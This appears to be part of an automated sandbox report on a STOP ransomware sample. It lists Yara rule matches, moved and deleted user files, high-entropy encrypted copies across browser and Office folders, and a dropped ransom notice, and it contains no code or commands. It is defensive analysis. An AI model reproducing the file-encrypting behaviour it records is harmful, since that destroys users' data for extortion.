Source: Yara match	File source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPED

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File moved: C:\Users\user\Desktop\NWTVCDUMOB.mp3	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File deleted: C:\Users\user\Desktop\NWTVCDUMOB.mp3	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File moved: C:\Users\user\Desktop\DVWHKMNFNN\IPKGELNTQY.mp3	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File deleted: C:\Users\user\Desktop\DVWHKMNFNN\IPKGELNTQY.mp3	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File moved: C:\Users\user\Desktop\NWTVCDUMOB.pdf	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;h

Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99381460329	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.jfm entropy: 7.9901223659	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99530298897	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99601269757	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99252942164	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99746832261	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.9964620667	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99087792106	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.9983111011	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99836865416	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99836537098	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99839115882	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99831623072	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99859178324	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99876541211	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133507029727626976.txt entropy: 7.99841826973	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945576432631.txt entropy: 7.99835209347	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99843243455	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99727267213	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99855046906	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99734387242	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99353038114	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99859215154	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99318745073	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99785705452	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.99838605744	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wct150C.tmp.vapo (copy) entropy: 7.99708809205	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wct33D7.tmp.vapo (copy) entropy: 7.99758803949	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wct38F0.tmp.vapo (copy) entropy: 7.99774487413	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wct443C.tmp.vapo (copy) entropy: 7.99726849773	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.vapo (copy) entropy: 7.99680609175	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.vapo (copy) entropy: 7.99756193181	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.vapo (copy) entropy: 7.99753673478	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.vapo (copy) entropy: 7.99740380621	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.vapo (copy) entropy: 7.99800616406	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wctF411.tmp.vapo (copy) entropy: 7.99759240613	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.vapo (copy) entropy: 7.99252942164	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.vapo (copy) entropy: 7.99746832261	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.vapo (copy) entropy: 7.9964620667	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.vapo (copy) entropy: 7.99087792106	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000000.1675353698.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000000.1691104107.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000000.1702670598.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.1787026670.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000000.1774903809.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.1868782664.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.1855703010.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPED	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPED	Matched rule: Detects STOP ransomware Author: ditekSHen

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047D240	0_2_0047D240
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00489F90	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00475057	0_2_00475057
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047C070	0_2_0047C070
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0049E003	0_2_0049E003
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0049F010	0_2_0049F010
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00478030	0_2_00478030
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004770E0	0_2_004770E0
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00480160	0_2_00480160
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00538113	0_2_00538113
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004721C0	0_2_004721C0
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00539343	0_2_00539343
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004B237E	0_2_004B237E
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00475447	0_2_00475447
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00475457	0_2_00475457
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004784C0	0_2_004784C0
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004A44FF	0_2_004A44FF
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004B9506	0_2_004B9506
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004BB5B1	0_2_004BB5B1
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047A660	0_2_0047A660
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00479686	0_2_00479686
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0048E690	0_2_0048E690
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00476740	0_2_00476740
